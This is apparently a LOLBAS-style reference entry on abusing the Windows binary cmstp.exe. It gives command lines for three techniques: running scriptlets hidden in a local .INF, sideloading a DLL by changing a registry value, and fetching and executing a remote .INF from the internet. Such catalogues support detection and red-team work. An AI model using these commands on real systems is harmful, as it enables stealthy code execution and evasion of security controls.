Installs or removes a Connection Manager service profile.
Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
Execute code hidden within an inf file. Download and run scriptlets from internet.
cmstp.exe reads the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll registry value and passes its data directly to LoadLibrary. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via cmstp.exe.
cmstp.exe /nf
Proxy execution of a malicious DLL via registry modification.
Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
cmstp.exe /ni /s {REMOTEURL:.inf}
Execute code hidden within an inf file. Execute code directly from Internet.